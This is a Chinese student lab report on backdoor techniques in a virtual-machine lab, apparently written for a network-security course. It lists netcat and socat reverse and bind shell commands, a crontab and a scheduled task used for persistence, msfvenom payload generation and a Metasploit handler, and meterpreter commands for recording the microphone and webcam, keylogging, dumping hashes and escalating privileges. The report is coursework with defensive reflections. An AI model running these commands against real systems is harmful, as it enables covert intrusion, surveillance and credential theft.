其他分享
首页 > 其他分享> > Exp2-后门原理与实践

Exp2-后门原理与实践

作者:互联网

Exp2-后门原理与实践

实验内容 (4分+2分附加题)

(1)使用netcat获取主机操作Shell,cron启动 (1分)

(2)使用socat获取主机操作Shell, 任务计划启动 (1分)

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(1分)

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (1分)

(5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(2分)加分内容一并写入本实验报告。
(评分者注意,附加分写在评论里,不要和主分数混在一起)

一、常用后门工具

​ 1.Netcat 、Socat系列

​ 2.Meterpreter

​ 3.Intersect

​ 4.CHAOS……

​ 本次实验我们主要使用Netcat 、Socat系列以及Meterpreter。

二、实验内容

(一)使用netcat获取主机操作Shell,cron启动

1.kali获取windows虚拟机的shell

(1)查看kali虚拟机的IP地址
ifconfig

image-20220328145638357

(2)在kali虚拟机中开启监听,端口号以学号为基础指定
nc -l -p 11310

image-20220328150159057

(3)windows反弹连接Linux,这里首先在windows下进入ncat所在的文件夹,ip的地址为Linux的地址
ncat.exe -e cmd.exe 192.168.40.128 11310

image-20220328150237745

(4)Linux下看到Windows的命令提示,验证shell

image-20220328150314905

2.Windows获取kali虚拟机的shell

(1)获取Windows中的IP地址
ipconfig

image-20220328150442897

(2)在ncat文件夹目录下打开监听,端口选择类学号数字
ncat.exe -l -p 11310

image-20220328150530413

(3)Linux反弹连接win
nc 192.168.3.40 11310 -e /bin/sh

$$
/bin/sh是UNIX命令提供shell去执行shell命令
$$

image-20220328150911516

(4)Windows获得kali的shell,使用linux常用指令验证
ls pwd whoami

image-20220328150942038

3.cron启动

Linux下进行
①Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。
man cron

image-20220328151006165

②crontab指令增加一条定时任务,"-e"表示编辑
crontab -e

image-20220328151102338

③第一次编辑需要选择,我们选择2选项
④设置自启动时间,每个小时的第12分钟执行后面的指令
12 * * * * /bin/netcat 172.16.229.166 11310 -e /bin/sh

image-20220328151805963

⑤在相应的时间节点打开监听,这里我们选择主机Windows

image-20220328151645226

时间节点已经到,我们可以看见这里window已经获得了Linux的shell

(二)使用socat获取主机操作Shell, 任务计划启动

1.Windows获取kali虚拟机的shell

(1)Kali开放11310端口
socat tcp-listen:11310 system:bash,pty,stderr

image-20220328151933829

(2)Windows连接Kali虚拟机,获取终端,IP地址为Linux地址
socat - tcp:192.168.40.128:11310

image-20220328152139653

注意:需要在socat文件目录中运行

(3)验证终端功能,完全正常
ls pwd whoami

image-20220328152155118

2.Kali获取Windows虚拟机的shell

(1)Windows开放11310端口
socat tcp-listen:11310 exec:cmd,pty,stderr 

image-20220328152422148

(2)Kali机连接Windows获取终端
socat - tcp:192.168.3.40:11310

image-20220328152449576

(3)验证shell,成功
dir

image-20220328152452383

3.Windows下任务计划启动

(1)创建基本任务,在计算机管理的任务计划程序中进行操作

image-20220328152707323

(2)进行触发器、操作的相关设置
(3)编辑操作时,在参数中写上以下数据
tcp-listen:11310 exec:cmd,pty,stderr
(4)等待达到相应设计的时间进行观察

image-20220328153059498

(5)在Kali中进行socat连接,测试shell

image-20220328153148922

(三)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.Kali端生成后门可执行文件

Kali执行以下代码

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.40.128 LPORT=11310 -f exe > 20191310_backdoor.exe

image-20220328153413224

2.利用ncat将后门文件传送到Windows下获取终端

(1)在Windows的cmd下监听11310端口,获取后门文件
ncat.exe -l 11310 > 20191310_backdoor.exe

image-20220328153520981

(2)虚拟机传送后门文件
nc 192.168.3.40 11310 < 20191310_backdoor.exe

image-20220328154118997

(3)查看传送结果

传送成功:

image-20220328153710003

image-20220328154133295

(4)MSF

①启动msf

msfconsole

image-20220328154151376

②进行相关设置

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp 

image-20220328154225322

③设置LHOST、LPORT

set LHOST 192.168.40.128
set LPORT 11310

image-20220328154341324

(5)进行触发

exploit

(5)Windows下进行操作,打开后门可执行文件(可以用管理员身份运行)

(6)获取shell终端,使用dir验证,显示成功

image-20220328155422956

(四)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

1.获取目标主机音频

输入以下指令

record_mic

image-20220328155628310

2.获取目标摄像头内容

输入以下指令

webcam_snap

image-20220328155647333

3.获取击键记录

keyscan_start//开始记录
keyscan_dump//读取

image-20220328155732086

4.获取截屏信息

screenshot

image-20220328155811246

5.尝试提权

getsystem

根据此处博客设置方法,最终提权成功,在此不再赘述(https://blog.csdn.net/redwand/article/details/107527710)

6.许多有趣的攻击指令

	record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam
    hashdump       Dumps the contents of the SAM database
    timestomp      Manipulate file MACE attributes
    shell		   getshell

(五)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

1.后门exe文件方法

①生成exe可执行文件
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.40.128 LPORT=11310 -x pwn1 -f elf > pwn_exp2

image-20220328160020649

②运行生成的文件,注意必须先给生成的文件以权限
chmod +x pwn_exp2 *给权限*
./pwn_exp2 | nc 192.168.3.40 11310 -e /bin/sh *运行文件*

image-20220328161509070

③Windows下监听,获取shell并使用以下指令验证shell
ls whoami pwd

image-20220328161454086

三、实验总结与体会

​ 通过本次实验,我学会了在理想情况下,也就是实验情况下对linux和windows植入后门的操作,这算是我第一次对于后门的实践,这里面包括开启侦听、反弹连接、生成和传送后门程序、利用后门或者传送的程序控制被控主机、修改定时任务列表、使用ncat的加强工具socat获取主机操作Shell等。

​ 实验过程中,已经完完全全体会到了攻击者的“乐趣”和攻击成功后的成就感,当看到我的电脑摄像头自己闪光的时候,我想到了斯诺登揭露的那些事,原来这种技术我们就可以实现最简单的实践,这是何其真实和危险!

​ 网络安全有关国家安全,这次是真真切切让我感受到了,网络的世界有多少深不可测的高手,网络的空间有多少实实在在的攻击和巧妙的攻击手段,信息安全、网络安全绝对不容忽视!

​ 网络安全异常重要,网络对抗的实验真真切切让我学到了很多!我知道了后门的原理并且进行了简单的实践!

四、基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

我能想到的是我们下载软件的时候,采用的是一些方法链接,或者非官方渠道进行下载的话,这些我们下载的程序很有可能便被挂马或者留下后门了,而且一定是经过精心设计的,这样当我们使用这些程序软件的时候,后门就进入到我们的系统了

(2)例举你知道的后门如何启动起来(win及linux)的方式?

后门修改了系统设置,将定时启动管理器添加了定时的启动参数

linux中crontab文件被修改,周期性反向连接控制主机**

(3)Meterpreter有哪些给你映像深刻的功能?

生成的后门程序若在“理想情况”下可以偷偷录像,偷偷拍照,偷偷干好多事,非常有趣,但现在就是学习如何在现实状况下突破杀毒软件、防火墙等等障碍实现后门

(4)如何发现自己有系统有没有被安装后门?

1.看杀毒软件的反馈,如360,火绒等

2.观察系统的自启动项

  1. 观察任务管理器内的进程,看是否有异常进程和可疑进程
  2. 观察任务计划程序

标签:后门,shell,Windows,Exp2,实践,获取,socat,11310
来源: https://www.cnblogs.com/sisterben/p/16067688.html